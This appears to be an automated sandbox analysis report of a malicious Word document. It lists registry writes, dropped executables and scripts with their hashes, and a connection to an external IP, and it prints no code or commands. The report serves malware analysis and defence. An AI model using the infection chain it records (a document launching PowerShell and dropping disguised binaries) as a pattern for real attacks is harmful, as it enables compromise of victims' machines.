HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
25876247
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
XDOCSEditorFiles
1315831809
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1315831812
2608
winwsh.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2608
winwsh.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2968
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2968
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831840
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
EnableFileTracing
0
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
EnableConsoleTracing
0
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
FileTracingMask
4294901760
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
ConsoleTracingMask
4294901760
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
MaxFileSize
1048576
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32
FileDirectory
%windir%\tracing
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
EnableFileTracing
0
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
EnableConsoleTracing
0
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
FileTracingMask
4294901760
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
ConsoleTracingMask
4294901760
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
MaxFileSize
1048576
2808
InstallUtil.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS
FileDirectory
%windir%\tracing
2808
InstallUtil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2808
InstallUtil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2808
InstallUtil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2808
InstallUtil.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2808
InstallUtil.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
636
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
5$;
35243B007C020000010000000000000000000000
636
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
636
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
636
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
636
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831841
636
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831956
636
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831957
2196
winwsh.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2196
winwsh.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3416
winwsh.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3416
winwsh.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1

Files activity

Executable files
5
Suspicious files
9
Text files
4
Unknown types
2

Dropped files

PID
Process
Filename
Type
2588
cmd.exe
C:\Users\admin\AppData\Local\Temp\winwsh.exe
executable
MD5: d1ab72db2bedd2f255d35da3da0d4b16
SHA256: 047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0
2556
cmd.exe
C:\Users\admin\AppData\Local\Temp\winwsh.exe
executable
MD5: d1ab72db2bedd2f255d35da3da0d4b16
SHA256: 047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0
3880
cmd.exe
C:\Users\admin\AppData\Local\Temp\InstallUtil.exe
executable
MD5: d3fd43310ae691a68a872067f86ee4b0
SHA256: 41a3442445aa886b81e361e5e288459d8325895445bb36f9e4c1be54f76b92cb
2908
powershell.exe
C:\Users\admin\AppData\Local\Temp\tmp_pFWwjd.dat
executable
MD5: ac1230c9c219f57cfb92f4352a9697b4
SHA256: 89fdef30c14db09e4e82c561db4a35cbc039b95bdfa6340546f7ee54b887f59b
2968
powershell.exe
C:\Users\admin\AppData\Local\Temp\tmp_pFWwjd.dat
executable
MD5: ac1230c9c219f57cfb92f4352a9697b4
SHA256: 89fdef30c14db09e4e82c561db4a35cbc039b95bdfa6340546f7ee54b887f59b
2968
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1a2db8.TMP
binary
MD5: 901ecdf767744e6bb59cb023757886e3
SHA256: 48a990a7b1201bfd70f417698302a6299d036a6574e558a96000af48469479e1
2808
InstallUtil.exe
C:\Users\admin\AppData\Local\Temp\Tar424B.tmp
––
MD5:  ––
SHA256:  ––
2808
InstallUtil.exe
C:\Users\admin\AppData\Local\Temp\Cab424A.tmp
––
MD5:  ––
SHA256:  ––
2808
InstallUtil.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: 23fec608ec870399c1927b8d205c77ff
SHA256: b80f789994fb146194a7d916523a7406d650c3e32daf0d86121d6f3d971a3faa
2968
powershell.exe
C:\Users\admin\AppData\Local\Temp\Win629052.txt
text
MD5: a0e1f865d6c0bda0479ec7ba9a224d30
SHA256: 4e69b15f2c428c44e7270c06c0bf40da4b3f0d95f0260f2053b4c3bebe161992
636
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR38A5.tmp.cvr
––
MD5:  ––
SHA256:  ––
2808
InstallUtil.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
compressed
MD5: bb377df27a55c05bb3793cd1e125c869
SHA256: 3c4ec495f17d21cc236bc7238bc02728bd945c07157fbf875cac340269afc207
3596
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~DFD1C8E79EA51975CD.TMP
––
MD5:  ––
SHA256:  ––
3596
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~DFCEAF0A904DDAB7C5.TMP
––
MD5:  ––
SHA256:  ––
2968
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 901ecdf767744e6bb59cb023757886e3
SHA256: 48a990a7b1201bfd70f417698302a6299d036a6574e558a96000af48469479e1
2736
findstr.exe
C:\Users\admin\AppData\Local\Temp\s.ps1
text
MD5: a9573395d31bb540b14481dd23b3de8c
SHA256: c72117ddea367b6628f80558c9947eb408a944a4271b52688f2ca5c681237525
2968
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0WUO6NRW4WPI69BI0YNT.temp
––
MD5:  ––
SHA256:  ––
3596
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~$Bai.doc
pgc
MD5: 46def30cd051d76e21492136c4f47878
SHA256: 75a0885956d278e53ff131e7dcf034c7bf3246b94b506770b0b0a58ab4e05be1
3596
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: 37b0e99330d9f0c91ff7f89d2a5d75b1
SHA256: d15749b7bf088badac73c582ed9a1f82dfb6828462ea5b3e38bd9caf9bb08f06
2152
cmd.exe
C:\Users\admin\AppData\Local\Temp\s.ps1
text
MD5: a9573395d31bb540b14481dd23b3de8c
SHA256: c72117ddea367b6628f80558c9947eb408a944a4271b52688f2ca5c681237525
3596
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR282A.tmp.cvr
––
MD5:  ––
SHA256:  ––
2808
InstallUtil.exe
C:\Users\admin\AppData\Local\Temp\Cab4367.tmp
––
MD5:  ––
SHA256:  ––
2908
powershell.exe
C:\Users\admin\AppData\Local\Temp\Win629052.txt
text
MD5: a0e1f865d6c0bda0479ec7ba9a224d30
SHA256: 4e69b15f2c428c44e7270c06c0bf40da4b3f0d95f0260f2053b4c3bebe161992
2808
InstallUtil.exe
C:\Users\admin\AppData\Local\Temp\Tar425C.tmp
––
MD5:  ––
SHA256:  ––
2808
InstallUtil.exe
C:\Users\admin\AppData\Local\Temp\Cab425B.tmp
––
MD5:  ––
SHA256:  ––
2908
powershell.exe
C:\Users\admin\AppData\Local\Temp\Bai.doc
document
MD5: ae7c69ccbd4b94517e0487530ad274c2
SHA256: 9b4abbc1e65a721ee9bf45131e5e77e1bcb2d143e314c93bc63c609b8bd94577
2908
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1a21f1.TMP
binary
MD5: 901ecdf767744e6bb59cb023757886e3
SHA256: 48a990a7b1201bfd70f417698302a6299d036a6574e558a96000af48469479e1
2908
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 901ecdf767744e6bb59cb023757886e3
SHA256: 48a990a7b1201bfd70f417698302a6299d036a6574e558a96000af48469479e1
2908
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SF8GZ2297RU97NLCMP7.temp
––
MD5:  ––
SHA256:  ––
2808
InstallUtil.exe
C:\Users\admin\AppData\Local\Temp\Tar4368.tmp
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
1
TCP/UDP connections
10
DNS requests
1
Threats
0

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2808 InstallUtil.exe GET 200 93.184.221.240:80 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab US
compressed
whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
2808 InstallUtil.exe 144.202.54.86:443 Baltimore Technology Park, LLC US unknown
2808 InstallUtil.exe 93.184.221.240:80 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted

DNS requests

Domain IP Reputation
www.download.windowsupdate.com 93.184.221.240
whitelisted

Threats

No threats detected.

Debug output strings

No debug info.